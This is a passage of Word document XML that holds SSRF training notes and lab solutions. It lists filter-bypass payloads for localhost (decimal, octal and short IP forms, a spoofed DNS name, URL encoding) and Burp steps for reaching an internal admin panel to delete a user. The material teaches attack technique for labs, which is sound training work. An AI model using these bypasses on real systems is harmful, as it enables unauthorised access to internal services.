      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>), click "Add §".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A303603" w14:textId="77777777" w:rsidR="00964325" w:rsidRPr="00E4142C" w:rsidRDefault="00964325" w:rsidP="00964325">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Switch to the Payloads tab, change the payload type to Numbers, and enter 1, 255, and 1 in the "From" and "To" and "Step" boxes respectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269510FF" w14:textId="77777777" w:rsidR="00964325" w:rsidRPr="00E4142C" w:rsidRDefault="00964325" w:rsidP="00964325">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Click "Start attack".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB9BC83" w14:textId="77777777" w:rsidR="00964325" w:rsidRPr="00E4142C" w:rsidRDefault="00964325" w:rsidP="00964325">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Click on the "Status" column to sort it by status code ascending. You should see a single entry with a status of 200, showing an admin interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5381B811" w14:textId="77777777" w:rsidR="00964325" w:rsidRPr="00E4142C" w:rsidRDefault="00964325" w:rsidP="00964325">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Click on this request, send it to Burp Repeater, and change the path in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>stockApi</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t> to: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/admin/delete?username=carlos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75851F20" w14:textId="77777777" w:rsidR="007F665B" w:rsidRPr="00E4142C" w:rsidRDefault="007F665B" w:rsidP="007F665B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Circumventing common SSRF defenses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F080072" w14:textId="77777777" w:rsidR="007F665B" w:rsidRPr="00E4142C" w:rsidRDefault="007F665B" w:rsidP="007F665B">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It is common to see applications containing SSRF behavior together with defenses aimed at preventing malicious exploitation. Often, these defenses can be circumvented.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4105C598" w14:textId="77777777" w:rsidR="007F665B" w:rsidRPr="00E4142C" w:rsidRDefault="007F665B" w:rsidP="007F665B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SSRF with blacklist-based input filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157A2A31" w14:textId="77777777" w:rsidR="007F665B" w:rsidRPr="00E4142C" w:rsidRDefault="007F665B" w:rsidP="007F665B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Some applications block input containing hostnames like </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, or sensitive URLs like </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. In this situation, you can often circumvent the filter using various techniques:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB168B4" w14:textId="77777777" w:rsidR="007F665B" w:rsidRPr="00E4142C" w:rsidRDefault="007F665B" w:rsidP="007F665B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Using an alternative IP representation of </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>2130706433</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>017700000001</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>127.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530A7F21" w14:textId="77777777" w:rsidR="007F665B" w:rsidRPr="00E4142C" w:rsidRDefault="007F665B" w:rsidP="007F665B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Registering your own domain name that resolves to </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>. You can use </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>spoofed.burpcollaborator.net</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t> for this purpose.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BC089A" w14:textId="77777777" w:rsidR="007F665B" w:rsidRPr="00E4142C" w:rsidRDefault="007F665B" w:rsidP="007F665B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Obfuscating blocked strings using URL encoding or case variation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2593E776" w14:textId="77777777" w:rsidR="00DB66E5" w:rsidRPr="00E4142C" w:rsidRDefault="00DB66E5" w:rsidP="00DB66E5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lab: SSRF with blacklist-based input filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6383CC44" w14:textId="77777777" w:rsidR="00DB66E5" w:rsidRPr="00E4142C" w:rsidRDefault="00DB66E5" w:rsidP="00DB66E5">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>This lab has a stock check feature which fetches data from an internal system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524039B9" w14:textId="77777777" w:rsidR="00DB66E5" w:rsidRPr="00E4142C" w:rsidRDefault="00DB66E5" w:rsidP="00DB66E5">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>To solve the lab, change the stock check URL to access the admin interface at </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>http://localhost/admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t> and delete the user </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>carlos</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F35310" w14:textId="77777777" w:rsidR="00DB66E5" w:rsidRPr="00E4142C" w:rsidRDefault="00DB66E5" w:rsidP="00DB66E5">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>The developer has deployed two weak anti-SSRF defenses that you will need to bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B359D22" w14:textId="77777777" w:rsidR="00DB66E5" w:rsidRPr="00E4142C" w:rsidRDefault="00DB66E5" w:rsidP="00DB66E5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF0F2"/>
        <w:spacing w:before="0"/>
        <w:textAlignment w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DA004A" w14:textId="77777777" w:rsidR="00DB66E5" w:rsidRPr="00E4142C" w:rsidRDefault="00DB66E5" w:rsidP="00DB66E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Visit a product, click "Check stock", intercept the request in Burp Suite, and send it to Burp Repeater.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5049CFAE" w14:textId="77777777" w:rsidR="00DB66E5" w:rsidRPr="00E4142C" w:rsidRDefault="00DB66E5" w:rsidP="00DB66E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Change the URL in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>stockApi</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t> parameter to </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>http://127.0.0.1/</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t> and observe that the request is blocked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB113EA" w14:textId="77777777" w:rsidR="00DB66E5" w:rsidRPr="00E4142C" w:rsidRDefault="00DB66E5" w:rsidP="00DB66E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Bypass the block by changing the URL to: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>http://127.1/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3655B959" w14:textId="77777777" w:rsidR="00DB66E5" w:rsidRPr="00E4142C" w:rsidRDefault="00DB66E5" w:rsidP="00DB66E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Change the URL to </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
